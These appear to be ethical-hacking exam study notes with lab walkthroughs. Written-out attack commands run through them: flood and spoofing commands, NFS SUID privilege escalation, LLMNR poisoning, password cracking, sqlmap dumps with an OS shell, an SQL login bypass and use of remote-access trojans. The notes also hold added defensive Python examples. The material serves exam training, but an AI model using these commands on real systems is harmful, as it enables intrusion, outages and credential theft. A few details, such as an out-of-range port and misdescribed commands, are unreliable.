🧪 Labs and Training
Tools used by Technology Hacks
Linux 🐧
Netdiscover, Nmap, Hydra, John the Ripper, WPScan, Sqlmap, ADB, Hashcat, PhoneSploit, Metasploit.
Windows 🪟
Wireshark, HashCalc, VeraCrypt, BCTextEncoder, CrypTool, Snow, OpenStego.
Notes/Exercises
Nmap
Identify all active hosts in a network
nmap -sP <target_IP>/Subnet
Do a stealth (SYN) scan, evading firewall and IDS/IPS
nmap -sS -p 80,443 <target_IP>/Subnet
Identify the OS of the machine hosting a DB
To check targets with an open DB port (3306 or 1433): nmap -sV IP/subnet
or nmap -A IP/subnet
or nmap -p3306,1433 IP/subnet
and check the OS information reported for the host.
Locate IP address of the machine with RDP open port
nmap -Pn -sV -p 3389 <target_IP>
Find FQDN of domain controller
FQDN (FQDN = Hostname + Domain) an example can be: mail.example.com mail (hostname), example.com (domain).
Scan subnet or target filtering for LDAP port (389):
nmap -p389 -sV -iL <target_list>
-> if we have several target IPs (one per line in the list file)
or
nmap -p389 -sV <target_IP>
or
nmap -p 389 --script ldap-rootdse <target_IP>
If LDAP port is filtered or closed, we should try to scan host using following parameters:
nmap -Pn -A <target_IP>
Alternatively we may find the following ports open: 88 (Kerberos), 636 (LDAPS), 3268 (LDAP Global Catalog).
Running the nmap command we'll retrieve info about the domain and host name:
Domain: pentester.team Service Info: Host: DC;
then FQDN = DC.pentester.team
Identify the number of hosts that are alive
to check which hosts are up: nmap -sn IP/Subnet
Identify potential vulnerabilities of services
nmap -Pn --script vuln <target_IP>
Perform vertical privilege escalation of a root user, and enter the flag
Exploiting misconfigured NFS (port 2049)
nmap -sV -p 2049 IP/Subnet
sudo apt-get install nfs-common
nmap -sV --script=nfs-showmount <Target_IP>
check available mounts:
showmount -e <Target_IP>
-> we will see the /home directory
mkdir /tmp/nfs
sudo mount -t nfs 10.10.1.9:/home /tmp/nfs
cd /tmp/nfs
sudo cp /bin/bash .
sudo chmod +s bash
ls -la
-> it will be highlighted in red
sudo df -h
sudo chmod +s bash
Then, in another terminal:
Access the target using SSH
./bash -p
and we're root!
cd /home
ls -la
Find the flag:
find / -name "*.txt" -ls 2> /dev/null
Wireshark
Which machine started the DoS attack? On which IP did the DDoS attack happen? Find HTTP credentials in a PCAP file.
To find DoS (SYN and ACK):
Statistics -> IPv4 Statistics -> Source and Destination Addresses
filter using:
tcp.flags.syn == 1
or tcp.flags.syn == 1 and tcp.flags.ack == 0
or filter for the address with the highest number of requests
Analyze the pcap file and determine the number of machines that were involved in the DDoS attack
Statistics -> IPv4 Statistics -> Source and Destination Addresses
Or
View the flood attack on the victim via Wireshark | use filter tcp.port == 21
Or
Find the DoS attacker IP using Wireshark
Statistics -> Conversations
identify the IP which is flooding the server with SYN requests.
Or
get the IPv4 statistics -> we can see that Packets B -> A are null, because there are no reply packets.
To find passwords:
http.request.method == POST
To find DoS -> look for red and black packets with around 1-2 normal packets in between, then pick any packet and check the source and destination IP (with port if needed).
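The Wireshark steps above (the SYN-without-ACK filter, the Conversations view, and the "Packets B -> A are null" observation) can be expressed as detection logic. The script below is an added example, not part of the original notes: it runs over a constructed list of packet records instead of a .pcap so it works offline, and the addresses reuse the lab IPs from these notes purely as sample values.

```python
"""Flag SYN-flood sources from per-packet records.

Added example, not from the original notes. Each record is a constructed
tuple (src, dst, dst_port, syn, ack) standing in for one captured TCP packet.
"""
from collections import defaultdict

# Constructed traffic (not a real capture):
#  - 1.1.1.3 sends 8 SYNs to 1.1.1.6:22 and never receives a SYN/ACK
#  - 1.1.1.10 opens 2 normal connections to port 80 (SYN answered by SYN/ACK)
#  - 1.1.1.11 opens 6 normal connections to port 443
PACKETS = (
    [("1.1.1.3", "1.1.1.6", 22, True, False)] * 8
    + [("1.1.1.10", "1.1.1.6", 80, True, False),
       ("1.1.1.6", "1.1.1.10", 80, True, True)] * 2
    + [("1.1.1.11", "1.1.1.6", 443, True, False),
       ("1.1.1.6", "1.1.1.11", 443, True, True)] * 6
)


def syn_only(pkts):
    """Same selection as the display filter: tcp.flags.syn == 1 and tcp.flags.ack == 0."""
    return [p for p in pkts if p[3] and not p[4]]


def conversation_stats(pkts):
    """Per (client, server) pair: SYNs sent (A -> B) and SYN/ACKs received (B -> A).

    This is the information the Statistics -> Conversations view gives you.
    """
    stats = defaultdict(lambda: {"syn_sent": 0, "synack_back": 0})
    for src, dst, _port, syn, ack in pkts:
        if syn and not ack:
            stats[(src, dst)]["syn_sent"] += 1
        elif syn and ack:
            # A SYN/ACK travels server -> client, so it belongs to the (client, server) pair.
            stats[(dst, src)]["synack_back"] += 1
    return stats


def flood_sources(pkts, min_syn=5, max_reply_ratio=0.2):
    """Return (client, server, syn_sent, synack_back) for pairs whose SYNs go (almost) unanswered.

    A source that sends many SYNs and receives few or no SYN/ACKs is the half-open
    pattern of a SYN flood; normal clients get one SYN/ACK per SYN.
    """
    suspects = []
    for (src, dst), s in conversation_stats(pkts).items():
        if s["syn_sent"] >= min_syn and s["synack_back"] / s["syn_sent"] <= max_reply_ratio:
            suspects.append((src, dst, s["syn_sent"], s["synack_back"]))
    return sorted(suspects, key=lambda t: -t[2])


if __name__ == "__main__":
    print("SYN-only packets:", len(syn_only(PACKETS)))
    for src, dst, sent, back in flood_sources(PACKETS):
        print(f"suspect {src} -> {dst}: {sent} SYN sent, {back} SYN/ACK back")
```

The thresholds (`min_syn`, `max_reply_ratio`) are assumptions for the sample data; on a real capture you would tune them against the baseline connection rate of the server, and feed the function from a pcap reader rather than the constructed list.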
SYN DDOS Attack using Hping
hping3 -S 1.1.1.6 -a 1.1.1.3 -p 22 --flood
1.1.1.6 is target IP
1.1.1.3 is the spoof IP
22 is port number.
POD - Ping of Death Attack
hping3 -d 65538 -S -p 21 --flood 1.1.1.6
-d is data size
-S is syn packets
-p is the port (you can flood any app with open ports).
UDP Flood attack
hping3 -2 -p 139 --flood 1.1.1.6
-2 is for UDP
-p is port
Identify IoT Message and its Length using capture.cap
Filter .cap file on wireshark with 'MQTT' filter
Select packet related to Publish Message
Click on MQ Telemetry Transport Protocol -> Header Flags -> Msg Len
or
Click on MQ Telemetry Transport Protocol -> Publish Message -> Msg Len
BCTextEncoder
Decrypt the encoded secret and enter the decrypted text as the answer
Use BCTextEncoder to decrypt the encoded secret file; the password may be the same as the SMB login password.
LLMNR Poisoning and NTLM Hash Cracking
Responder: responder -I eth0 -rdwv
Copy the hash from responder to ntlmhash.txt
and crack it using Hashcat or John
Hashcat
hashcat -m 0 -a 0 hash.txt passwordlist.txt
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt
-m 0: MD5 hash mode
-a 0: dictionary attack mode
hash.txt: text file containing the hash in a compliant format
passwordlist.txt: dictionary file containing passwords in plain text
John the Ripper
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john /usr/share/responder/logs/SMB-NTLMv2-SSP-1.1.15.txt
Hydra
Crack the FTP credentials to obtain the file stored on the FTP server and enter its content as the answer
Find IP with FTP open port: nmap -p 21 IP/Subnet
if we know username:
hydra -l user -P passlist.txt ftp://IP
if we don't know username and password:
hydra -L /user.txt -P password.txt ftp://IP
or hydra -L /home/attacker/Desktop/CEH_TOOLS/Wordlists/Username.txt -P /home/attacker/Desktop/CEH_TOOLS/Wordlists/Password.txt ftp://IP
Login using FTP credentials obtained, get flag and cat it.
Crack the SMB credentials knowing username to obtain file stored into share
Brute force smb login
Download file stored into share
Entropy
Perform a deep scan on the ELF files and obtain the last 4 digits of the SHA-384 hash of the file with the highest entropy value, located in the Android folder
Scan adb port:
nmap ip -sV -p 5555
Connect adb:
adb connect IP:5555
Access mobile device:
adb shell
Elevate privilege using:
sudo -i
(if it is possible)
pwd
-->ls
-->cd sdcard/Notifications/Scan
-->ls
-->cat secret.txt
(If you can't find it, check the other folders)
Download files:
adb pull /sdcard/Notifications/Scan
Do it in another shell, without the adb connection!
We have three ELF files; now we need to calculate the entropy of each of them using this command:
ent file.elf
After selecting the file.elf with the highest entropy, we need to calculate its SHA-384 hash:
sha384sum file.elf
and consider only the last 4 digits of the hash result.
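The two measurements above (`ent` for bits of entropy per byte, `sha384sum` for the digest) are easy to reproduce in a few lines, which also lets you check all three files in one pass. This is an added example, not part of the original notes; the three "ELF" byte strings are constructed stand-ins, not files pulled from a device, and the function names are mine.

```python
"""Pick the highest-entropy file and report the tail of its SHA-384.

Added example, not from the original notes. FILES holds constructed byte
strings that imitate three ELF files with very different byte distributions.
"""
import hashlib
import math
from collections import Counter

# Constructed sample "files" (only the 4-byte ELF magic is real; the rest is filler):
FILES = {
    "a.elf": b"\x7fELF" + b"\x00" * 200 + b"ABCD" * 50,   # mostly padding -> low entropy
    "b.elf": b"\x7fELF" + bytes(range(256)) * 2,           # every byte value -> close to 8 bits/byte
    "c.elf": b"\x7fELF" + b"\x00\x01" * 300,               # two symbols -> about 1 bit/byte
}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the first figure printed by `ent`."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def sha384_tail(data: bytes, digits: int = 4) -> str:
    """Last `digits` hex characters of the SHA-384 digest, as the exercise asks."""
    return hashlib.sha384(data).hexdigest()[-digits:]


def highest_entropy_file(files: dict) -> tuple:
    """Return (name, entropy, sha384 tail) for the file with the highest entropy."""
    name = max(files, key=lambda k: shannon_entropy(files[k]))
    return name, shannon_entropy(files[name]), sha384_tail(files[name])


if __name__ == "__main__":
    for name, data in FILES.items():
        print(f"{name}: {shannon_entropy(data):.4f} bits/byte, sha384 ...{sha384_tail(data)}")
    print("highest entropy:", highest_entropy_file(FILES))
```

To run it against the files pulled with `adb pull`, replace `FILES` with a dict built from `open(path, "rb").read()` for each ELF; a packed or encrypted binary will sit near 8 bits/byte, which is why high entropy is the signal the exercise keys on.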
FTP
To download resources from FTP service we can use following commands:
GoBuster
SQLMap
Finding a vulnerable site
site:http://testphp.vulnweb.com/ php?=
(for cookies: browser console -> document.cookie)
Having the cookie value is better, because it reduces the time needed to produce results!
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs (databases)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables (tables)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns (columns)
Dump whole table
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump
OR
(dump individual column data)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass --dump
sqlmap -u "http://vmw.moviescope.com/viewprofile.aspx?id=1" --dbs (copy the cookie from the website)
mysql -u qdpmadmin -h 192.168.1.8 -p (if you have login credentials)
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" --dbs
Get list of tables ->
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" -D mysql --tables
Dump data from tables ->
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" -D mysql -T db --dump
Get OS shell ->
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" --os-shell
Perform an SQL injection attack on the web application and retrieve the password of user Mario (you only know these credentials: maria:ferrari10)
If we already know credentials (as in our case), log in; otherwise we need to bypass the login by putting into the username box:
user' OR 1=1 --
and a random text into the password box.
Click on "view profile" (../viewprofile.aspx?id=1). There, we can use an IDOR vulnerability (manipulating the id= value) to see info about another user. Alternatively we can use SQLMap to dump user info.
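Why the `user' OR 1=1 --` string above bypasses a login, and what the fix looks like, is clearer with the query on both sides. The block below is an added example, not from the original notes or the lab application: it builds an in-memory SQLite table (the `maria:ferrari10` row reuses the credentials quoted in the exercise as constructed sample data; the `mario` row and its password are invented), runs the same login check once with string concatenation and once with bound parameters, and lets you compare the results.

```python
"""Vulnerable vs. parameterised login query (added example, not the lab's code)."""
import sqlite3

# The payload quoted in the exercise notes.
BYPASS_USERNAME = "user' OR 1=1 --"


def setup_db() -> sqlite3.Connection:
    """Constructed users table; real applications store password hashes, not plaintext."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("maria", "ferrari10"), ("mario", "constructed-secret")],  # sample rows
    )
    return db


def login_vulnerable(db, user: str, pwd: str):
    """Concatenates input into the SQL text, so the quote and the -- comment
    marker become part of the query grammar: the password check is commented out
    and `OR 1=1` makes the WHERE clause true for every row."""
    sql = f"SELECT uname FROM users WHERE uname = '{user}' AND pass = '{pwd}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user: str, pwd: str):
    """Binds the input as parameters, so the database compares the literal
    string "user' OR 1=1 --" against the uname column and finds no match."""
    row = db.execute(
        "SELECT uname FROM users WHERE uname = ? AND pass = ?", (user, pwd)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_USERNAME, "anything"))  # logs in as the first row
    print("safe      :", login_safe(db, BYPASS_USERNAME, "anything"))        # no match
    print("safe, real:", login_safe(db, "maria", "ferrari10"))
```

The same parameter binding is the fix for the `id=` parameter behind the `viewprofile.aspx` page; it stops the injection, but not the IDOR, which needs an authorisation check that the requested profile belongs to the logged-in user.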
Snow
snow.exe -C -p "password" stegfile.txt
OpenStego
Analyze the image file and extract the sensitive data hidden in the file
Download OpenStego for Windows OS -> https://github.com/syvaidya/openstego/releases/download/openstego-0.8.6/Setup-OpenStego-0.8.6.exe
Run OpenStego
Select Extract Data
Upload the file and select the destination path
As the password, enter a likely keyword present in the question
Click on Extract Data
CrypTool
Can you decrypt the file and provide the contents of "flag1.txt" as the answer?
Connect to ftp using cmd:
ftp IP
After connecting to FTP, go to the file and download it using the get or mget commands:
get file.txt
get file1.txt
Decrypt file: open CrypTool program -> Encrypt/Decrypt -> Symmetric (modern) -> DES (ECB)
WPSCAN
Identify the password associated with the user ID "sarah" and resolve the issue to allow her to access her account again.
wpscan --url http://192.168.1.10:8080/CEH -u sarah -P passwdlist.txt
Hashes.com
Decrypt/Crack the MD5 hash present on a website
A file called "Secrethash.txt" has been uploaded via DVWA at http://192.168.1.10:8080/DVWA. The file is located at the following path: C:\wamp64\www\DVWA\hackable\uploads\Secret-Hash.txt. Your task is to crack the MD5 hash present in the file and reveal the original message. You can access the file by logging into DVWA using the provided credentials: superuser::superman.
Go to the site, log in, then browse to the URL uploads/Secret-hash.txt
Decrypt file using this web tool: https://hashes.com/en/decrypt/hash
RDP
Connect to RDP port
Find secret number hidden inside the file located in a directory (accessible using RDP)
A file named "Secret.txt" that has been concealed within the Server 2019 machine is located at the following path: C:\Users\Dell\Documents\Confidential.
You will need to use a backdoor installed in the server to access the file. (This hint is a red herring.)
Your objective is to find the secret number hidden inside the file and provide it as your answer.
Use the RDP user credentials found in the previous (RDP) answer to log in.
Browse to the mentioned path C:\Users\Dell\Documents\Confidential
Open "Secret.txt" file and copy the number inside.
Find the suspicious account: you have the credentials of one user, so you can use RDP (port 3389) to log in and find the suspicious account.
Open cmd and use the command:
net user
Check phone number of Maria
A site has an SQLi vulnerability; the cookie information is stored in a text file in the Documents folder of the EH-2 machine. Use the SQL DSSS attack method to capture the session link. Determine the contact number of Maria associated with the website.
We bypass authentication, then use IDOR to find Maria's number.
Netbios
If you get any questions related to NetBIOS or SMB, use Metasploit.
SMB
Nmap
SMBMap
SMB - Hydra
SMB - Metasploit
SMB Connection
Malware Analysis
Identify malware entry point address
PEiD (suggested)
Download the PEiD tool -> https://softfamous.com/peid/
Execute PEiD tool
Upload malware executable
See entry point address
PEView
Download PEView tool
Execute tool
Upload malware executable
Look for the "Optional Header" section within the PEView interface. In this section, you should find the "AddressOfEntryPoint" field, which represents the entry point of the executable. Note the hexadecimal value displayed in the "AddressOfEntryPoint" field. This is the entry point address of the executable.
Detect it easy
Execute Detect it easy client tool
Upload malware executable
Click on File info
See entry point address
or we can use: PE Explorer tools
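All of the tools listed above read the same field, the `AddressOfEntryPoint` in the PE optional header that the PEView step describes. The parser below is an added example, not from the original notes or from any of those tools: it walks the DOS header -> `e_lfanew` -> PE signature -> COFF header -> optional header and returns the entry point RVA and its virtual address. Since no sample malware is on the page, `build_minimal_pe` constructs a tiny PE header in memory as the input; the function names are mine.

```python
"""Read AddressOfEntryPoint from a PE file (added example, not a tool from the notes)."""
import struct

COFF_HEADER = "<HHIIIHH"   # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
                           # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def build_minimal_pe(entry_point: int, pe_offset: int = 0x80) -> bytes:
    """Construct a header-only PE32 image with the given entry point (test fixture, not real malware)."""
    dos = bytearray(pe_offset)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, pe_offset)             # e_lfanew -> offset of "PE\0\0"
    coff = struct.pack(COFF_HEADER, 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section, 0xE0-byte optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, entry_point)             # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                # ImageBase (PE32: 4 bytes at offset 28)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def entry_point(pe: bytes) -> dict:
    """Return the PE format, entry point RVA, image base and resulting virtual address."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file (missing MZ)")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff_off = e_lfanew + 4
    _machine, _nsect, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from(COFF_HEADER, pe, coff_off)
    if opt_size == 0:
        raise ValueError("no optional header (object file, not an image)")
    opt_off = coff_off + 20
    (magic,) = struct.unpack_from("<H", pe, opt_off)
    if magic == PE32_MAGIC:
        (image_base,) = struct.unpack_from("<I", pe, opt_off + 28)
        fmt = "PE32"
    elif magic == PE32PLUS_MAGIC:
        (image_base,) = struct.unpack_from("<Q", pe, opt_off + 24)  # PE32+ has no BaseOfData; ImageBase is 8 bytes at 24
        fmt = "PE32+"
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    (aoep,) = struct.unpack_from("<I", pe, opt_off + 16)      # AddressOfEntryPoint sits at offset 16 in both formats
    return {"format": fmt, "entry_rva": aoep, "image_base": image_base, "entry_va": image_base + aoep}


if __name__ == "__main__":
    sample = build_minimal_pe(0x1230)
    info = entry_point(sample)
    print(f"{info['format']}: AddressOfEntryPoint = {info['entry_rva']:#x}, VA = {info['entry_va']:#x}")
```

On a real sample, pass `open(path, "rb").read()` to `entry_point`; the RVA it returns is the hexadecimal value PEView shows in the `AddressOfEntryPoint` field, and adding the image base gives the address a debugger would show (ignoring ASLR relocation). The function deliberately refuses files without a `PE\0\0` signature or an optional header instead of guessing.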
Retrieve file connecting to RAT installed into victim machine
Theef default port: 9871, 6703, FTP 2968
NJRAT default port: 5552
MoSucker default port: 200005
ProRat default port: 5110
ProRat
Execute ProRat
Set victim IP and relative port 5110
Click to connect and search files.
Theef
Execute Theef
Set the victim IP and the related ports 6703 and 2968 (or a custom port)
Click on connect and open the file manager.
NjRat
Execute NjRat
Insert IP and Port
Click on manager and open directory
Aircrack-ng
Crack the wireless encryption and identify the Wi-Fi password
1st attempt: aircrack-ng pcapfile
(usually works only for WEP encryption)
2nd attempt: aircrack-ng -w passwordlist pcapfile
3rd attempt: add the BSSID (-b flag): aircrack-ng -b BSSID -w passwordlist pcapfile
(To find the BSSID: in Wireshark click on a packet, search for BSSID and copy the value)
Veracrypt
Access the Veracrypt volume, and find the secret code
Decrypt the password needed to access the volume
Mount the encrypted drive (C:) in VeraCrypt using the decrypted password
Find the secret code file stored on the C drive.
Download file from FTP
wget -m ftp://anonymous:anonymous@<ip>
wget -m --no-passive ftp://anonymous:anonymous@<ip>
Basic Windows cmd 🪟
net user -> domain user enumeration
type C:\path.txt -> displays the content of the path.txt file.
dir
cd
hostname
whoami
pwd
Basic Linux cmd 🐧
ls - view contents of directory (list)
pwd - path of the current directory
cd - change directory
mkdir - make new directory
mv - move files / rename files
cp - copy files
rm - remove files
touch - create blank new file
rmdir - delete directory
cat - list content of file to terminal
clear - clear terminal window
echo - print text (with > it writes the data into a file)
less - Read text file one screen at a time
man - show manual of Linux commands
sudo - enables you to perform tasks that require administrative or root permissions
top - task manager in terminal
tar - used to archive multiple files into a tarball
grep - search for words in specific files
head - view first lines of any text file
tail - view last lines of any text file
diff - compares the contents of two files line by line
kill - used for killing unresponsive program
jobs - display all current jobs along with their statuses
sort - is a command line utility for sorting lines of text files
df - info about system disk
du - check how much space a file or directory takes
zip - to compress your files into a zip archive
unzip - to extract the zipped files from a zip archive
ssh - a secure encrypted connection between two hosts over an insecure network
cal - shows calendar
apt - command line tool for interaction with packaging system
alias - custom shortcuts used to represent a command
w - current user info
whereis - used to locate the binary, source, manual page files
whatis - used to get one-line man page description
useradd - used to create a new user
passwd - change the password of the current user
whoami - print current user
uptime - print the current time and the time elapsed since the machine started
free - print free disk space info
history - print used commands history
uname - print detailed information about your Linux system
ping - to check connectivity status to a server
chmod - to change permissions of files and directories
chown - to change ownership of files and directories
find - search for files and directories
locate - locate a file, just like the search command in Windows
ifconfig - print IP address information
ip a - similar to ifconfig but with shorter output
finger - gives you a short dump of info about a user
Find command
Searching the target system for important information and potential privilege escalation vectors can be fruitful. The built-in "find" command is useful and worth keeping in your arsenal.
Below are some useful examples for the "find" command.
Find files:
find / -type f -iname "flag1.txt" 2>/dev/null
: find the file named "flag1.txt" (case insensitive) under / without showing error output
find . -name flag1.txt
: find the file named "flag1.txt" in the current directory
find /home -name flag1.txt
: find the file named "flag1.txt" in the /home directory
find / -type d -name config
: find the directory named config under "/"
find / -type f -perm 0777
: find files with 777 permissions (files readable, writable, and executable by all users)
find / -perm a=x
: find executable files
find /home -user frank
: find all files for user "frank" under "/home"
find / -mtime 10
: find files that were modified in the last 10 days
find / -atime 10
: find files that were accessed in the last 10 days
find / -cmin -60
: find files changed within the last hour (60 minutes)
find / -amin -60
: find files accessed within the last hour (60 minutes)
find / -size 50M
: find files with a 50 MB size
This command can also be used with (+) and (-) signs to specify a file that is larger or smaller than the given size.
The example above returns files that are larger than 100 MB. It is important to note that the "find" command tends to generate errors which sometimes makes the output hard to read. This is why it would be wise to use the "find" command with "-type f 2>/dev/null" to redirect errors to "/dev/null" and have a cleaner output.
Folders and files that can be written to or executed from:
find / -writable -type d 2>/dev/null
: Find world-writeable folders
find / -perm -222 -type d 2>/dev/null
: Find world-writeable folders
find / -perm -o w -type d 2>/dev/null
: Find world-writeable folders
The reason we see three different "find" commands that could potentially lead to the same result can be seen in the manual page. As you can see below, the perm parameter affects the way "find" works.
find / -perm -o x -type d 2>/dev/null
: Find world-executable folders
Find development tools and supported languages:
find / -name perl*
find / -name python*
find / -name gcc*
Find specific file permissions:
Below is a short example used to find files that have the SUID bit set. The SUID bit allows the file to run with the privilege level of the account that owns it, rather than the account which runs it.
This allows for an interesting privilege escalation path, which we will see in more detail in task 6.
The example below is given to complete the subject of the "find" command.
find / -perm -u=s -type f 2>/dev/null
: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.
Alternative in Windows OS
Other resources